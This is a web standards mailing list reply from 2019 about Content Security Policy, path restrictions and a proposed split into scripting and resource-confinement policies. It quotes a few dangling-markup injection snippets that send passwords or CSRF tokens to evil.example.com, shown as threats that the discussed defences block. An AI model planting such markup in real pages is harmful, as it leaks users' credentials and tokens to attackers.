Re: A modest content security proposal.

On Tue, 23 Jul 2019 at 08:51, Mike West <mkwst@google.com> wrote:

> On Thu, Jul 18, 2019 at 3:03 PM Craig Francis <craig.francis@gmail.com>
> wrote:
>
>> Dropbox does, e.g.
>>
>>     script-src ... https://www.dropbox.com/*static/compiled/js*/ ...
>>
>
> That's interesting! I see a `script-src` directive of:
>
> """
> 'unsafe-eval' https://www.dropbox.com/static/compiled/js/
> https://www.dropbox.com/static/api/ https://www.dropbox.com/page_success/
> https://cfl.dropboxstatic.com/static/compiled/js/
> https://www.dropboxstatic.com/static/compiled/js/
> https://cfl.dropboxstatic.com/static/js/
> https://www.dropboxstatic.com/static/js/
> https://cfl.dropboxstatic.com/static/src/dws-ensemble-appshell/
> https://www.dropboxstatic.com/static/src/dws-ensemble-appshell/
> https://cfl.dropboxstatic.com/static/previews/
> https://www.dropboxstatic.com/static/previews/
> https://cfl.dropboxstatic.com/static/api/
> https://www.dropboxstatic.com/static/api/
> https://cfl.dropboxstatic.com/static/cms/
> https://www.dropboxstatic.com/static/cms/ 'nonce-bd/4MtKomUcNJnd6l1bf'
> """
>


Yep, I did need to abbreviate their `script-src` a bit, I just wanted to
show paths being used :-)



> I wonder whether any redirects exist under any of those directories?
>


A more typical (smaller) website probably doesn't need that many paths, and
if they only contain static files, then you're unlikely to find a redirect
in there.

As in, it's common to have a "/js/", "/css/", and "/img/" folders when
using a minifier/compressor, a ES5-to-ES6 transpiler, webm convertor, etc.

It's when third party content gets involved, that it gets complicated
(hence why I keep going on about making iframes easier to use, e.g. setting
the height automatically <https://github.com/craigfrancis/iframe-height>,
as it means some of the third party JavaScript can be locked in there).

I'm hopeful that over time, website development will get used to these
security features, and make them easier to implement... where developers
will often start with the basics, then increase the restrictions over time.


I don't have fundamental objections to including some sort of path
> restrictions in whatever we do next. I don't think they're terribly useful
> as-defined in CSP3: they sincerely complicate writing a parser, and they're
> more or less neutered so as to not leak data about redirects.
>


Assuming those paths don't include redirects, I think the path restrictions
are still useful.


I'll describe my setup below, but in summary, while the initial setup took
>> a few days, I was able to start with hostname only, and then I switched to
>> path based restrictions one at a time.
>>
>> And once paths were setup, maintenance has been really easy (especially
>> if the tooling exists to easily add paths to the CSP).
>>
>
> Thanks! This is interesting information! +Devdatta Akhawe
> <dev@dropbox.com> might have thoughts about the work/reward ratio that
> went into creating Dropbox's list.
>


Yep, I'd be interested in their view as well (Dropbox does have quite a
long list, I'm assuming it's to cover the whole site, rather than being
page specific?).


My "trusted" server has a folder for user uploaded content, and I always
>> see that as relatively dangerous.
>>
>
> That seems like a thing that would be worth looking into changing. `
> googleusercontent.com` exists for a reason. :)
>


I'm also looking at setting up a domain just for my static content.

But the user uploaded content does require authorisation to view (e.g.
medical documents), and getting that to work cross domain is more
complicated (not impossible), and I need it to work on my development and
testing/demo servers (I'll skip that bit today).


The intention is to have layers... 1. my server side code shouldn't have
>>> any XSS vulnerabilities; if it does, 2. CSP should stop the loading of
>>> scripts; if that fails (e.g. a legitimate script was replaced by a hacker),
>>> 3. that script should be limited in what it can do to that page.
>>>
>>
>> Nothing in this proposal (or CSP) limits the capability of a script to
>> modify a given page. They both seem to limit the ability of a script to
>> pull in resources, and potentially to exfiltrate data.
>>
>>
>>
>> True, modifying the current page isn't great, and I don't think there is
>> a way to stop that.
>>
>> It does limit the script in getting information, and then applying
>> modifications based on that, or pulling in even more resources (e.g. a
>> crypto miner).
>>
>> But if that page contains sensitive data (e.g. information about someones
>> disabilities), I want to do everything I can to stop that data getting out.
>>
>> Admittedly I'm sure there are still ways of exfiltrating, but my current
>> CSP should make it difficult if the attacker has *only* managed to
>> get JavaScript execution.
>>
>> That's where I would like the Resource Confinement to focus on... let's
>> say the nonce based XSS Mitigation has failed, what now? do we just let the
>> malicious JS do whatever it wants?
>>
>
> Yes.
>
> Unless (until!) we invent a mechanism for sandboxing scripts on a page
> (and WASM's import structure might be a reasonable model), nothing about
> the determination of _which_ scripts to execute will have an impact on
> _what_ those scripts can do once they execute.
>


Some kind of sandboxing on the page would be pretty cool.

But, if evil JavaScript is running (i.e. Scripting-Policy has failed
somehow), and let's say it has access to the full DOM (no
sandbox), Resource Confinement to specific paths can still be useful.

For example, if the JavaScript can get the value from a textarea, how does
it get it out?

On my site it can't send the data via a form tag (form-action); the only
image/css/js files are from paths that contain static content (the servers
access logs aren't easily read); fetch/XMLHttpRequest is blocked (or
limited to a certain API); and while not implemented completely yet,
`navigate-to` will hopefully stop a navigation request passing that data
via a query string... I'm sure there may be other ways (maybe something
that causes a DNS lookup to the attacker controlled domain?), but these
path restrictions have made it a lot harder, can they be bothered to keep
trying?


And finally, some DOM messing around can cause issues:
>>>
>>>    <form action="https://evil.example.com">
>>>    <form action="./">
>>>       <input name="password" />
>>>    </form>
>>>
>>>    <img src='https://evil.example.com<form action="./"><input
>>> name="csrf" value="abc123" />...' />...
>>>
>>
>> These are indeed problems (along with the rest of
>> http://lcamtuf.coredump.cx/postxss/).
>>
>>
>>
>> I'm fairly sure that's where I saw those problems first... but due to the
>> CSP restrictions I've been able to add, with paths, I think I've got those
>> issues covered as well (via form-action, img-src, and other things).
>>
>
> I suspect these will be better handled by changing the platform, a la
> https://github.com/whatwg/fetch/issues/546 (which Chromium shipped, Apple
> objected to, and Mozilla seemed on board with, at least conceptually).
>


I agree, it will be better handled that way, and I'm looking forward to it
happening, especially as it looks like the "\n" should be an easy one to
block, and I hope "<" can be done as well (ref an SVG in a `data:` URI).

Then it leaves an incredibly unlikely one, where you have an issue before
and after plain text data, but this is becoming quite contrived...

     The student XXX<img src="https://evil.example.com has YYY and is from
ZZZ">.

Possibly done by a CSRF changing the student's name and location... meh,
that's probably a bit too weird.


Maybe introduce Scripting-Policy first; then deprecate the old/un-necessary
>>> parts of CSP, but still keep CSP around with a focus on Resource
>>> Confinement?
>>>
>>
>> `Scripting-Policy` is the bit I'm most interested in, to be sure. I'm
>> interested in `Confinement-Policy` mostly as a way to support the
>> belt-and-suspenders approach noted in
>> https://csp.withgoogle.com/docs/faq.html#strict-dynamic-with-whitelists.
>>
>> I think it will be difficult to use `Scripting-Policy` with CSP's
>> `script-src` directive (or, at least, I'd consider it a non-goal to make
>> that interaction simple and easy). If we're going to run in this direction,
>> I'd prefer to just do one thing. Obviously we wouldn't dump CSP tomorrow,
>> but I don't think keeping both around forever is a reasonable plan.
>>
>>
>>
>> That's a good example.
>>
>> The `Scripting-Policy` header should be the developers first and
>> main focus, where I think it would help mitigate *most* of the XSS problems.
>>
>> But I'd still like to apply strict Resource Confinement.
>>
>> Maybe the recommendation to developers should be that the CSP header is
>> added by websites that want/need to apply those extra restrictions?
>>
>> I think the current CSP syntax works well for that, it already gives you
>> host based restrictions, it already allows you to add path restrictions,
>> and it does it by resource type.
>>
>> Doing the nonce part separately, and deprecating things which aren't
>> needed any more, will leave a fairly good Confinement-Policy.
>>
>
> That might well be a reasonable approach. I think CSP's history as a
> dual-use mechanism has made some things more complicated than pure resource
> confinement (see `style-src`'s `'unsafe-eval'` and `'unsafe-inline'` for
> instance), but perhaps we can excise those pieces over time?
>


I'd be very happy with that direction... get `Scripting-Policy` working
first, then deprecate/remove/excise the messy bits of CSP so it can be used
by sites that want to do Resource Confinement.



As to the websites I build, this is perhaps going a bit off topic, but
>> might be useful...
>>
>
> Thanks for the description of your workflow! I found it very interesting,
> but I don't have any terribly insightful feedback for you beyond that. :)
>
> -mike
>

Received on Tuesday, 23 July 2019 19:44:20 UTC